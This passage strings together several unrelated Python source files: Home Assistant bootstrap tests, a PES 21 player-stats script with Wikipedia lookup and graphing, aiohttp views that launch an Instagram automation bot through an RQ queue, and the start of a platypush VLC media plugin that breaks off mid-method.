ORIG_TIMEZONE = dt_util.DEFAULT_TIME_ZONE
VERSION_PATH = os.path.join(get_test_config_dir(), config_util.VERSION_FILE)
_LOGGER = logging.getLogger(__name__)
class TestBootstrap:
"""Test the bootstrap utils."""
hass = None
backup_cache = None
# pylint: disable=invalid-name, no-self-use
def setup_method(self, method):
"""Setup the test."""
self.backup_cache = loader._COMPONENT_CACHE
if method == self.test_from_config_file:
return
self.hass = get_test_home_assistant()
def teardown_method(self, method):
"""Clean up."""
if method == self.test_from_config_file:
return
dt_util.DEFAULT_TIME_ZONE = ORIG_TIMEZONE
self.hass.stop()
loader._COMPONENT_CACHE = self.backup_cache
if os.path.isfile(VERSION_PATH):
os.remove(VERSION_PATH)
@mock.patch(
        # prevent .HA_VERSION file from being written
'homeassistant.bootstrap.conf_util.process_ha_config_upgrade',
autospec=True)
@mock.patch('homeassistant.util.location.detect_location_info',
autospec=True, return_value=None)
    def test_from_config_file(self, mock_detect, mock_upgrade):
"""Test with configuration file."""
components = ['browser', 'conversation', 'script']
files = {
'config.yaml': ''.join(
'{}:\n'.format(comp)
for comp in components
)
}
with mock.patch('os.path.isfile', mock.Mock(return_value=True)), \
mock.patch('os.access', mock.Mock(return_value=True)), \
patch_yaml_files(files, True):
self.hass = bootstrap.from_config_file('config.yaml')
components.append('group')
assert sorted(components) == sorted(self.hass.config.components)
def test_handle_setup_circular_dependency(self):
"""Test the setup of circular dependencies."""
loader.set_component('comp_b', MockModule('comp_b', ['comp_a']))
def setup_a(hass, config):
"""Setup the another component."""
bootstrap.setup_component(hass, 'comp_b')
return True
loader.set_component('comp_a', MockModule('comp_a', setup=setup_a))
bootstrap.setup_component(self.hass, 'comp_a')
assert ['comp_a'] == self.hass.config.components
def test_validate_component_config(self):
"""Test validating component configuration."""
config_schema = vol.Schema({
'comp_conf': {
'hello': str
}
}, required=True)
loader.set_component(
'comp_conf', MockModule('comp_conf', config_schema=config_schema))
with assert_setup_component(0):
assert not bootstrap.setup_component(self.hass, 'comp_conf', {})
with assert_setup_component(0):
assert not bootstrap.setup_component(self.hass, 'comp_conf', {
'comp_conf': None
})
with assert_setup_component(0):
assert not bootstrap.setup_component(self.hass, 'comp_conf', {
'comp_conf': {}
})
with assert_setup_component(0):
assert not bootstrap.setup_component(self.hass, 'comp_conf', {
'comp_conf': {
'hello': 'world',
'invalid': 'extra',
}
})
with assert_setup_component(1):
assert bootstrap.setup_component(self.hass, 'comp_conf', {
'comp_conf': {
'hello': 'world',
}
})
def test_validate_platform_config(self):
"""Test validating platform configuration."""
platform_schema = PLATFORM_SCHEMA.extend({
'hello': str,
})
loader.set_component(
'platform_conf',
MockModule('platform_conf', platform_schema=platform_schema))
loader.set_component(
'platform_conf.whatever', MockPlatform('whatever'))
with assert_setup_component(0):
assert bootstrap.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'hello': 'world',
'invalid': 'extra',
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert bootstrap.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
},
'platform_conf 2': {
'invalid': True
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(0):
assert bootstrap.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'not_existing',
'hello': 'world',
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert bootstrap.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert bootstrap.setup_component(self.hass, 'platform_conf', {
'platform_conf': [{
'platform': 'whatever',
'hello': 'world',
}]
})
self.hass.config.components.remove('platform_conf')
        # Any falsy platform config will be ignored (None, {}, etc.)
with assert_setup_component(0) as config:
assert bootstrap.setup_component(self.hass, 'platform_conf', {
'platform_conf': None
})
assert 'platform_conf' in self.hass.config.components
assert not config['platform_conf'] # empty
assert bootstrap.setup_component(self.hass, 'platform_conf', {
'platform_conf': {}
})
assert 'platform_conf' in self.hass.config.components
assert not config['platform_conf'] # empty
def test_component_not_found(self):
"""setup_component should not crash if component doesn't exist."""
assert not bootstrap.setup_component(self.hass, 'non_existing')
def test_component_not_double_initialized(self):
"""Test we do not setup a component twice."""
mock_setup = mock.MagicMock(return_value=True)
loader.set_component('comp', MockModule('comp', setup=mock_setup))
assert bootstrap.setup_component(self.hass, 'comp')
assert mock_setup.called
mock_setup.reset_mock()
assert bootstrap.setup_component(self.hass, 'comp')
assert not mock_setup.called
@mock.patch('homeassistant.util.package.install_package',
return_value=False)
def test_component_not_installed_if_requirement_fails(self, mock_install):
"""Component setup should fail if requirement can't install."""
self.hass.config.skip_pip = False
loader.set_component(
'comp', MockModule('comp', requirements=['package==0.0.1']))
assert not bootstrap.setup_component(self.hass, 'comp')
assert 'comp' not in self.hass.config.components
def test_component_not_setup_twice_if_loaded_during_other_setup(self):
"""Test component setup while waiting for lock is not setup twice."""
loader.set_component('comp', MockModule('comp'))
result = []
def setup_component():
"""Setup the component."""
result.append(bootstrap.setup_component(self.hass, 'comp'))
thread = threading.Thread(target=setup_component)
thread.start()
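        # Simulate the component being set up elsewhere while the worker thread
        # runs; setup_component should notice and not set it up a second time.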
self.hass.config.components.append('comp')
thread.join()
assert len(result) == 1
assert result[0]
def test_component_not_setup_missing_dependencies(self):
"""Test we do not setup a component if not all dependencies loaded."""
deps = ['non_existing']
loader.set_component('comp', MockModule('comp', dependencies=deps))
assert not bootstrap.setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
loader.set_component('non_existing', MockModule('non_existing'))
assert bootstrap.setup_component(self.hass, 'comp', {})
def test_component_failing_setup(self):
"""Test component that fails setup."""
loader.set_component(
'comp', MockModule('comp', setup=lambda hass, config: False))
assert not bootstrap.setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
def test_component_exception_setup(self):
"""Test component that raises exception during setup."""
def exception_setup(hass, config):
"""Setup that raises exception."""
raise Exception('fail!')
loader.set_component('comp', MockModule('comp', setup=exception_setup))
assert not bootstrap.setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
def test_home_assistant_core_config_validation(self):
"""Test if we pass in wrong information for HA conf."""
# Extensive HA conf validation testing is done in test_config.py
assert None is bootstrap.from_config_dict({
'homeassistant': {
'latitude': 'some string'
}
})
def test_component_setup_with_validation_and_dependency(self):
"""Test all config is passed to dependencies."""
def config_check_setup(hass, config):
"""Setup method that tests config is passed in."""
if config.get('comp_a', {}).get('valid', False):
return True
raise Exception('Config not passed in: {}'.format(config))
loader.set_component('comp_a',
MockModule('comp_a', setup=config_check_setup))
loader.set_component('switch.platform_a', MockPlatform('comp_b',
['comp_a']))
bootstrap.setup_component(self.hass, 'switch', {
'comp_a': {
'valid': True
},
'switch': {
'platform': 'platform_a',
}
})
assert 'comp_a' in self.hass.config.components
def test_platform_specific_config_validation(self):
"""Test platform that specifies config."""
platform_schema = PLATFORM_SCHEMA.extend({
'valid': True,
}, extra=vol.PREVENT_EXTRA)
mock_setup = mock.MagicMock(spec_set=True)
loader.set_component(
'switch.platform_a',
MockPlatform(platform_schema=platform_schema,
setup_platform=mock_setup))
with assert_setup_component(0):
assert bootstrap.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'invalid': True
}
})
assert mock_setup.call_count == 0
self.hass.config.components.remove('switch')
with assert_setup_component(0):
assert bootstrap.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'valid': True,
'invalid_extra': True,
}
})
assert mock_setup.call_count == 0
self.hass.config.components.remove('switch')
with assert_setup_component(1):
assert bootstrap.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'valid': True
}
})
assert mock_setup.call_count == 1
def test_disable_component_if_invalid_return(self):
"""Test disabling component if invalid return."""
loader.set_component(
'disabled_component',
MockModule('disabled_component', setup=lambda hass, config: None))
assert not bootstrap.setup_component(self.hass, 'disabled_component')
assert loader.get_component('disabled_component') is None
assert 'disabled_component' not in self.hass.config.components
loader.set_component(
'disabled_component',
MockModule('disabled_component', setup=lambda hass, config: False))
assert not bootstrap.setup_component(self.hass, 'disabled_component')
assert loader.get_component('disabled_component') is not None
assert 'disabled_component' not in self.hass.config.components
loader.set_component(
'disabled_component',
MockModule('disabled_component', setup=lambda hass, config: True))
assert bootstrap.setup_component(self.hass, 'disabled_component')
assert loader.get_component('disabled_component') is not None
assert 'disabled_component' in self.hass.config.components
def test_all_work_done_before_start(self):
"""Test all init work done till start."""
call_order = []
def component1_setup(hass, config):
"""Setup mock component."""
discovery.discover(hass, 'test_component2',
component='test_component2')
discovery.discover(hass, 'test_component3',
component='test_component3')
return True
def component_track_setup(hass, config):
"""Setup mock component."""
call_order.append(1)
return True
loader.set_component(
'test_component1',
MockModule('test_component1', setup=component1_setup))
loader.set_component(
'test_component2',
MockModule('test_component2', setup=component_track_setup))
loader.set_component(
'test_component3',
MockModule('test_component3', setup=component_track_setup))
@callback
def track_start(event):
"""Track start event."""
call_order.append(2)
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START, track_start)
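        # Replace run_until_complete so the call below simply waits for all
        # pending setup work on the test instance instead of re-running the loop.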
self.hass.loop.run_until_complete = \
lambda _: self.hass.block_till_done()
bootstrap.from_config_dict({'test_component1': None}, self.hass)
self.hass.start()
assert call_order == [1, 1, 2]
|
script.py
|
# IMPORTS
from tkinter.filedialog import askopenfilename
import json
import importlib
import threading
import time
from tabulate import tabulate
import numpy as np
import matplotlib.pyplot as plt
import os
import shutil
import webbrowser
from wikipedia import wikipedia
import colorama
from termcolor import cprint
from win10toast import ToastNotifier
# CLASS CONTAINING GLOBAL VARIABLES
class GlobalVariables:
totalGoals = 0
totalAssists = 0
statObjectsList = []
completePlayerStats = []
tour = type
dictFilename = ""
txtFilename = ""
pathDelimiter = "../"
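    # Relative path to the data directory; main() falls back to "./" when the
    # script is launched from the project root instead of a subfolder.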
tkinterFilePath = ""
maxPercentageGoalInvolvement = 0
mostValuablePlayer = ""
mostValuablePlayerWikiInfo = ""
AG_PlayerDataDict = {}
HM_PlayerDataDict = {}
NS_PlayerDataDict = {}
TZ_PlayerDataDict = {}
script_helper = type
Search_Number = 0
# CLASS FOR CALCULATING PLAYER STATS
class PlayerStats():
def __init__(self, name, goals, assists):
self.name = name
self.goals = goals
self.assists = assists
self.percentage_goal_involvement = np.around(((self.goals*3 + self.assists*2) / (
GlobalVariables.totalGoals*3 + GlobalVariables.totalAssists*2) * 100), decimals=2)
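        # Goal involvement weights goals 3x and assists 2x, expressed as a
        # percentage of the weighted total across all players.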
self.single_player_complete_stat = []
self.single_player_complete_stat.extend(
[self.name, self.goals, self.assists, self.percentage_goal_involvement])
GlobalVariables.completePlayerStats.append(
self.single_player_complete_stat)
if self.percentage_goal_involvement > GlobalVariables.maxPercentageGoalInvolvement:
GlobalVariables.maxPercentageGoalInvolvement = self.percentage_goal_involvement
GlobalVariables.mostValuablePlayer = self.name
# FINDING LAST MODIFIED FILE
def get_new_file(filesPath):
filename = ""
cont = 'n'
list_of_files = os.listdir(filesPath)
if len(list_of_files) == 0:
print("\nUnable to find any file")
else:
        # Compare modification times as floats; comparing the scientific-notation
        # strings returned by np.format_float_scientific is not reliable.
        modified_time_of_new_file = os.path.getmtime(filesPath+list_of_files[0])
        filename = list_of_files[0]
        for i in list_of_files:
            mtime = os.path.getmtime(filesPath+i)
            if mtime > modified_time_of_new_file:
                modified_time_of_new_file = mtime
                filename = i
if filename.endswith(".txt"):
print("\nNew file found: ", filename)
cont = input("Continue? (y/n): ").lower().strip()
else:
print("\nUnable to find any file")
cont = 'n'
if cont == 'y' or cont == '':
return filename
elif cont == 'n':
manual_file_select = input(
"Enter filename manually (eg. jan1) or Enter to skip: ").lower().strip()
manual_file_select = manual_file_select+".txt"
if manual_file_select not in list_of_files:
print("Cannot find", manual_file_select+". Opening filepicker")
abs_txt_path = askopenfilename(
filetypes=[('Text Document', '*.txt')])
tfilename = str(abs_txt_path).split('/')[-1]
GlobalVariables.tkinterFilePath = abs_txt_path
return tfilename
else:
return manual_file_select
else:
raise Exception("Invalid input. Exiting")
# MAKE A COPY OF FILE IF THE FILE IS CHOSEN WITH tkinter
def write_to_file(tkinter_chosen_file_path):
if tkinter_chosen_file_path != GlobalVariables.pathDelimiter+"files/"+GlobalVariables.txtFilename:
shutil.copyfile(tkinter_chosen_file_path,
GlobalVariables.pathDelimiter+"files/"+GlobalVariables.txtFilename)
# TO GET THE RESPECTIVE WORKING DICTIONARY FROM script_helper.py
def get_working_dict_from_helper():
GlobalVariables.script_helper = importlib.import_module("script_helper")
GlobalVariables.tour, GlobalVariables.dictFilename = GlobalVariables.script_helper.get_working_dict(
GlobalVariables.txtFilename)
# CALCULATING TOTAL GOALS
def sum_of_goals(every_player_stats):
goal_list = []
goal_list = np.array(goal_list)
for i in every_player_stats:
goal_list = np.append(goal_list, i[1])
return (int(np.sum(goal_list)))
# CALCULATING TOTAL ASSISTS
def sum_of_assists(every_player_stats):
assist_list = []
assist_list = np.array(assist_list)
for i in every_player_stats:
assist_list = np.append(assist_list, i[2])
return (int(np.sum(assist_list)))
# DOING WIKIPEDIA SEARCH ON MVP
def wiki_search():
while GlobalVariables.Search_Number < 3:
search_term = GlobalVariables.mostValuablePlayer
category = "football"
try:
keyword = wikipedia.search(search_term)[
GlobalVariables.Search_Number]
WikiInfo = str(wikipedia.summary(
keyword, sentences=2, auto_suggest=False))
if WikiInfo.lower().find(category) != -1:
GlobalVariables.mostValuablePlayerWikiInfo = WikiInfo
return
else:
GlobalVariables.Search_Number += 1
wiki_search()
except:
GlobalVariables.mostValuablePlayerWikiInfo = "None"
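# Illustrative behaviour: wikipedia.search() may return several candidate pages for
# the MVP's name; the first 2-sentence summary mentioning "football" is kept,
# otherwise the next result is tried, for at most 3 attempts.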
# SAVING EVERY PLAYER'S TOTAL STATS
def record_player_stats(list_element, player_dict, alph):
if player_dict != {}:
if list_element[0] in player_dict.keys():
goal_updated = player_dict[list_element[0]][0] + list_element[1]
assist_updated = player_dict[list_element[0]][1] + list_element[2]
count = player_dict[list_element[0]][2][2] + 1
avg_goals = np.around(goal_updated / count, decimals=2)
avg_assists = np.around(assist_updated / count, decimals=2)
val_updated = {list_element[0]: [
goal_updated, assist_updated, [avg_goals, avg_assists, count]]}
if alph == "AG":
GlobalVariables.AG_PlayerDataDict.update(val_updated)
elif alph == "HM":
GlobalVariables.HM_PlayerDataDict.update(val_updated)
elif alph == "NS":
GlobalVariables.NS_PlayerDataDict.update(val_updated)
else:
GlobalVariables.TZ_PlayerDataDict.update(val_updated)
else:
remaining_lists_dict = {list_element[0]: [
list_element[1], list_element[2], [list_element[1], list_element[2], 1]]}
if alph == "AG":
GlobalVariables.AG_PlayerDataDict.update(remaining_lists_dict)
elif alph == "HM":
GlobalVariables.HM_PlayerDataDict.update(remaining_lists_dict)
elif alph == "NS":
GlobalVariables.NS_PlayerDataDict.update(remaining_lists_dict)
else:
GlobalVariables.TZ_PlayerDataDict.update(remaining_lists_dict)
if player_dict == {}:
remaining_lists_dict = {list_element[0]: [
list_element[1], list_element[2], [list_element[1], list_element[2], 1]]}
if alph == "AG":
GlobalVariables.AG_PlayerDataDict.update(remaining_lists_dict)
elif alph == "HM":
GlobalVariables.HM_PlayerDataDict.update(remaining_lists_dict)
elif alph == "NS":
GlobalVariables.NS_PlayerDataDict.update(remaining_lists_dict)
else:
GlobalVariables.TZ_PlayerDataDict.update(remaining_lists_dict)
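# Example of the stored structure (hypothetical player and numbers): after two files
# contributing 2+1 and 1+0 goals/assists, the record becomes
#   {"A. Example": [3, 1, [1.5, 0.5, 2]]}
# i.e. [total_goals, total_assists, [avg_goals, avg_assists, file_count]].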
# TABULATE PRETTY PRINTING
def tabular_display(table, headers):
print("\n")
print(tabulate(table, headers, tablefmt="pretty"))
# MAIN
def main():
# DISPLAYING TITLE
display_statements_list = ["PES 21 myClub Tour"]
width = len(display_statements_list[0])
colorama.init()
print('+-' + '-' * width + '-+')
for s in display_statements_list:
cprint('| {0:^{1}} |'.format(s, width), color='green')
print('+-' + '-'*(width) + '-+')
# FINDING CORRECT PATH pathDelimiter FOR BAT EXECUTION
try:
os.listdir(GlobalVariables.pathDelimiter+"files")
except FileNotFoundError:
GlobalVariables.pathDelimiter = "./"
# FINDING THE LATEST MODIFIED FILE
GlobalVariables.txtFilename = get_new_file(
GlobalVariables.pathDelimiter+"files/")
if GlobalVariables.txtFilename == '':
raise FileNotFoundError("No file chosen")
# GETTING THE RELEVANT TOUR DICTIONARY
get_working_dict_from_helper_thread = threading.Thread(
target=get_working_dict_from_helper, daemon=False)
get_working_dict_from_helper_thread.start()
# READING FROM THE TXT FILE
every_player_stats = []
single_player_stat = []
try:
if GlobalVariables.tkinterFilePath == "":
openfilepath = GlobalVariables.pathDelimiter+"files/"+GlobalVariables.txtFilename
else:
openfilepath = GlobalVariables.tkinterFilePath
write_to_file(GlobalVariables.tkinterFilePath)
with open(file=openfilepath, mode="r", encoding="utf-8") as working_file:
for line in working_file:
if line.startswith("Player Name"):
continue
else:
line = line.strip().split("\t")
param1 = str(line[0])
param2 = int(line[1])
param3 = int(line[2])
single_player_stat.extend([param1, param2, param3])
every_player_stats.append(list(single_player_stat))
single_player_stat.clear()
except FileNotFoundError:
raise FileNotFoundError("There is no such file in the directory\n")
# FINDING TOTAL GOALS & ASSIST NUMBERS
GlobalVariables.totalGoals = sum_of_goals(every_player_stats)
GlobalVariables.totalAssists = sum_of_assists(every_player_stats)
# STORING ALL OBJECTS
for item in every_player_stats:
GlobalVariables.statObjectsList.append(
PlayerStats(item[0], item[1], item[2]))
# WIKIPEDIA SEARCH THREAD
wiki_search_thread = threading.Thread(target=wiki_search, daemon=False)
wiki_search_thread.start()
# SAVING EVERY PLAYERS TOTAL STATS
analysis_mode = input(
"Turn on player analysis mode? (y/n): ").lower().strip()
if analysis_mode == 'y' or analysis_mode == '':
try:
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_ag.json", mode="r", encoding="utf8") as input_json:
try:
player_dict_ag = json.load(input_json)
except:
player_dict_ag = {}
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_hm.json", mode="r", encoding="utf8") as input_json:
try:
player_dict_hm = json.load(input_json)
except:
player_dict_hm = {}
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_ns.json", mode="r", encoding="utf8") as input_json:
try:
player_dict_ns = json.load(input_json)
except:
player_dict_ns = {}
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_tz.json", mode="r", encoding="utf8") as input_json:
try:
player_dict_tz = json.load(input_json)
except:
player_dict_tz = {}
except FileNotFoundError:
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_ag.json", mode="w+", encoding="utf8"):
player_dict_ag = {}
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_hm.json", mode="w+", encoding="utf8"):
player_dict_hm = {}
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_ns.json", mode="w+", encoding="utf8"):
player_dict_ns = {}
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_tz.json", mode="w+", encoding="utf8"):
player_dict_tz = {}
alphabets_P1 = list(map(chr, range(65, 72)))
alphabets_P2 = list(map(chr, range(72, 78)))
alphabets_P3 = list(map(chr, range(78, 84)))
alphabets_P4 = list(map(chr, range(84, 91)))
for i in GlobalVariables.completePlayerStats:
player_name_first_char = i[0][0]
if player_name_first_char in alphabets_P1:
record_player_stats(i, player_dict_ag, "AG")
elif player_name_first_char in alphabets_P2:
record_player_stats(i, player_dict_hm, "HM")
elif player_name_first_char in alphabets_P3:
record_player_stats(i, player_dict_ns, "NS")
elif player_name_first_char in alphabets_P4:
record_player_stats(i, player_dict_tz, "TZ")
else:
print("Unicode error:", player_name_first_char,
"in", i[0]+". Skipping")
pass
player_dict_ag.update(GlobalVariables.AG_PlayerDataDict)
player_dict_hm.update(GlobalVariables.HM_PlayerDataDict)
player_dict_ns.update(GlobalVariables.NS_PlayerDataDict)
player_dict_tz.update(GlobalVariables.TZ_PlayerDataDict)
GlobalVariables.AG_PlayerDataDict.clear()
GlobalVariables.HM_PlayerDataDict.clear()
GlobalVariables.NS_PlayerDataDict.clear()
GlobalVariables.TZ_PlayerDataDict.clear()
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_ag.json", mode="w+", encoding="utf8") as output_json:
json.dump(player_dict_ag, output_json, sort_keys=True, indent=4)
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_hm.json", mode="w+", encoding="utf8") as output_json:
json.dump(player_dict_hm, output_json, sort_keys=True, indent=4)
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_ns.json", mode="w+", encoding="utf8") as output_json:
json.dump(player_dict_ns, output_json, sort_keys=True, indent=4)
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_tz.json", mode="w+", encoding="utf8") as output_json:
json.dump(player_dict_tz, output_json, sort_keys=True, indent=4)
# SORTING TABLE
table = GlobalVariables.completePlayerStats
sorting_method = input(
"\nSpecify sorting method (1:Default | 2:Name | 3:Goals | 4:Assist | 5:Percentage involvement): ").lower().strip()
if sorting_method == "1" or sorting_method == '':
pass
elif sorting_method == '2':
table.sort(key=lambda x: x[0], reverse=False)
elif sorting_method == '3':
table.sort(key=lambda x: x[1], reverse=True)
elif sorting_method == '4':
table.sort(key=lambda x: x[2], reverse=True)
elif sorting_method == '5':
table.sort(key=lambda x: x[3], reverse=True)
else:
print("Input not valid. Default sorting selected")
pass
# DISPLAYING THE COMPLETE PLAYER STATS IN A PRETTY TABULAR FORMAT ALONG WITH TOTAL GOALS & ASSISTS
tabular_display(table, ["Name", "Goals", "Assists", "% Involvement"])
print("Total Goals:", GlobalVariables.totalGoals,
"\tTotal Assists:", GlobalVariables.totalAssists)
# DISPLAYING MVP NAME AND SHOWING WINDOWS 10 TOAST
print("\nMVP: ", end='')
try:
cprint(GlobalVariables.mostValuablePlayer, color='green')
except:
print(GlobalVariables.mostValuablePlayer)
try:
n = ToastNotifier()
n.show_toast("PES 21 myCLUB Tour", "Most valuable player is " +
GlobalVariables.mostValuablePlayer, icon_path=GlobalVariables.pathDelimiter+"internal/icons/logo.ico", threaded=True)
except:
pass
# DISPLAYING MVP'S WIKIPEDIA INFO
disp_mvp_info = input("\nDo you want to know about " +
GlobalVariables.mostValuablePlayer+"? (y/n): ").lower().strip()
if disp_mvp_info == 'y' or disp_mvp_info == '':
wiki_search_thread.join()
if GlobalVariables.mostValuablePlayerWikiInfo == "" or GlobalVariables.mostValuablePlayerWikiInfo == "None":
print("\n[Sorry. Wikipedia search was not successful]\n")
else:
print("\n"+str(GlobalVariables.mostValuablePlayerWikiInfo)+"\n")
srch_about_mvp = input("Want to know more (y/n): ").lower().strip()
if srch_about_mvp == 'y':
try:
url = "https://www.google.com.tr/search?q={}".format(
GlobalVariables.mostValuablePlayer)
print("Searching about",
GlobalVariables.mostValuablePlayer+". Opening web-browser")
time.sleep(0.3)
webbrowser.open_new_tab(url)
except:
raise Exception("\nError in opening the webbrowser")
# UPDATING THE WORKING DICTIONARY WITH NEW FILE'S TOTAL GOALS
get_working_dict_from_helper_thread.join()
year_suffix = GlobalVariables.script_helper.get_year_suffix(GlobalVariables.txtFilename)
raw_file_name = GlobalVariables.txtFilename.split(".txt")[0]
updated_key = year_suffix + '-' + \
(GlobalVariables.txtFilename[0:3] + "-" + raw_file_name[3:]).title()
GlobalVariables.tour.update({updated_key: GlobalVariables.totalGoals})
with open(GlobalVariables.pathDelimiter+"internal/"+GlobalVariables.dictFilename+".json", mode="w+", encoding="utf8") as dict_json:
json.dump(GlobalVariables.tour, dict_json, indent=4)
# SHOWING THE GRAPH
graph_show = input("\nSave graphical data? (y/n): ").lower().strip()
if graph_show == 'y' or graph_show == '':
key_lists = []
value_lists = []
for key, value in GlobalVariables.tour.items():
key_lists.append(key)
value_lists.append(value)
x_pos = np.arange(len(key_lists))
y_pos = value_lists
plt.rcdefaults()
plt.bar(x_pos, y_pos, align='center', alpha=0.5)
plt.xticks(x_pos, key_lists)
plt_title = GlobalVariables.script_helper.get_year(GlobalVariables.txtFilename) + " " + GlobalVariables.script_helper.getQuarter(GlobalVariables.txtFilename)
plt.title(plt_title)
plt.ylabel('Number of goals')
plt.xlabel('Tour event')
for i, v in enumerate(y_pos):
plt.text(x=i, y=v+1, s=str(v))
plt_graph_filepath = GlobalVariables.pathDelimiter + "statistics/" + plt_title + ".jpg"
mng = plt.get_current_fig_manager()
mng.window.state("zoomed")
plt.savefig(plt_graph_filepath, format='JPEG')
plt.show()
print("\nGraph saved at", plt_graph_filepath)
print("\nDONE!")
if __name__ == "__main__":
main()
# Code developed by
# https://github.com/gokulmanohar
|
views.py
|
#!venv/bin/python
# -*- coding: utf-8 -*-
import os
import aiohttp_jinja2
import aiohttp
from app.src.instabot import InstaBot
from app.src.stoppable_thread import StoppableThread
from rq import Queue
from app.worker import conn
from threading import Thread
async def index(request):
'''
Render main page template and status message (if exists).
'''
message = await getMessage(request)
context = {'title': 'Main', 'message': message}
return aiohttp_jinja2.render_template('index.html', request, context)
async def login(request):
'''
Collect data from the login form, log in and schedule the bot to run through an RQ queue
(a daemon-thread variant is kept commented out below).
See https://docs.python.org/3/library/threading.html#thread-objects
'''
data = await request.post()
login = data['login']
password = data['password']
like_per_day = int(data['like_per_day'])
comments_per_day = int(data['comments_per_day'])
follow_per_day = int(data['follow_per_day'])
bot = InstaBot(login=login,
password=password,
like_per_day=like_per_day,
comments_per_day=comments_per_day,
follow_per_day=follow_per_day,
log_mod=2)
# Start separate thread able to receive stop event
'''
t = StoppableThread(target=runBot, args=(bot, ))
t.setDaemon(True)
t.start()
'''
q = Queue(connection=conn)
q.enqueue(runBot, bot)
# Store pointers to thread and bot in app instance
request.app['queue'] = q
request.app['bot'] = bot
return aiohttp.web.HTTPFound('/mybot')
async def mybot(request):
'''
Render bot page template.
'''
context = {'title': 'Bot control panel'}
return aiohttp_jinja2.render_template('mybot.html', request, context)
async def show_log(request):
'''
Receive data from submit buttons and either stop the bot or show its log.
'''
data = await request.post()
# Get bot instance
bot = await getBot(request)
q = await getQueue(request)
# Check data from submit button
if bot and 'refresh' in data.keys():
# Fetch log data from bot instance and re-render page
context = {'title': 'Bot control panel', 'log': bot.log_full_text}
return aiohttp_jinja2.render_template('mybot.html', request, context)
elif bot and 'logout' in data.keys():
# Schedule logout event and go to main page
# Pass callables to enqueue() so they run on the worker instead of being called here
q.enqueue(bot.logout)
q.enqueue(exit, 0)
request.app['message'] = 'Bot is stopped'
return aiohttp.web.HTTPFound('/')
else:
# Other cases handling
request.app['message'] = 'You are not authorized'
return aiohttp.web.HTTPFound('/')
async def getMessage(request):
message = request.app['message']
return message
async def getBot(request):
bot = request.app['bot']
return bot
async def getQueue(request):
q = request.app['queue']
return q
def runBot(bot):
'''
Function to run the bot in auto mode
'''
bot.new_auto_mod()
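# Usage sketch (assumption: a Redis instance is reachable and the RQ CLI is installed):
# the jobs enqueued above are picked up by a separate worker process, e.g.
#   $ rq worker --url redis://localhost:6379
# which imports runBot and calls bot.new_auto_mod() outside the aiohttp event loop.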
|
__init__.py
|
import os
import threading
import urllib.parse
from typing import Optional
from platypush.context import get_bus
from platypush.plugins.media import PlayerState, MediaPlugin
from platypush.message.event.media import MediaPlayEvent, MediaPlayRequestEvent, \
MediaPauseEvent, MediaStopEvent, MediaSeekEvent, MediaVolumeChangedEvent, \
MediaMuteChangedEvent, NewPlayingMediaEvent
from platypush.plugins import action
class MediaVlcPlugin(MediaPlugin):
"""
Plugin to control vlc instances
Requires:
* **python-vlc** (``pip install python-vlc``)
* **vlc** executable on your system
"""
def __init__(self, args=None, fullscreen=False, volume=100, *argv, **kwargs):
"""
Create the vlc wrapper.
:param args: List of extra arguments to pass to the VLC executable (e.g.
``['--sub-language=en', '--snapshot-path=/mnt/snapshots']``)
:type args: list[str]
:param fullscreen: Set to True if you want media files to be opened in
fullscreen by default (can be overridden by `.play()`) (default: False)
:type fullscreen: bool
:param volume: Default media volume (default: 100)
:type volume: int
"""
super().__init__(*argv, **kwargs)
self._args = args or []
self._instance = None
self._player = None
self._latest_seek = None
self._default_fullscreen = fullscreen
self._default_volume = volume
self._on_stop_callbacks = []
self._title = None
self._filename = None
self._monitor_thread: Optional[threading.Thread] = None
self._on_stop_event = threading.Event()
self._stop_lock = threading.RLock()
@classmethod
def _watched_event_types(cls):
import vlc
return [getattr(vlc.EventType, evt) for evt in [
'MediaPlayerLengthChanged', 'MediaPlayerMediaChanged',
'MediaDurationChanged', 'MediaPlayerMuted',
'MediaPlayerUnmuted', 'MediaPlayerOpening', 'MediaPlayerPaused',
'MediaPlayerPlaying', 'MediaPlayerPositionChanged',
'MediaPlayerStopped', 'MediaPlayerTimeChanged', 'MediaStateChanged',
'MediaPlayerForward', 'MediaPlayerBackward',
'MediaPlayerEndReached', 'MediaPlayerTitleChanged',
'MediaPlayerAudioVolume',
] if hasattr(vlc.EventType, evt)]
def _init_vlc(self, resource):
import vlc
if self._instance:
self.logger.info('Another instance is running, waiting for it to terminate')
self._on_stop_event.wait()
self._reset_state()
for k, v in self._env.items():
os.environ[k] = v
self._monitor_thread = threading.Thread(target=self._player_monitor)
self._monitor_thread.start()
self._instance = vlc.Instance(*self._args)
self._player = self._instance.media_player_new(resource)
for evt in self._watched_event_types():
self._player.event_manager().event_attach(
eventtype=evt, callback=self._event_callback())
def _player_monitor(self):
self._on_stop_event.wait()
self.logger.info('VLC stream terminated')
self._reset_state()
def _reset_state(self):
with self._stop_lock:
self._latest_seek = None
self._title = None
self._filename = None
self._on_stop_event.clear()
if self._player:
self.logger.info('Releasing VLC player resource')
self._player.release()
self._player = None
if self._instance:
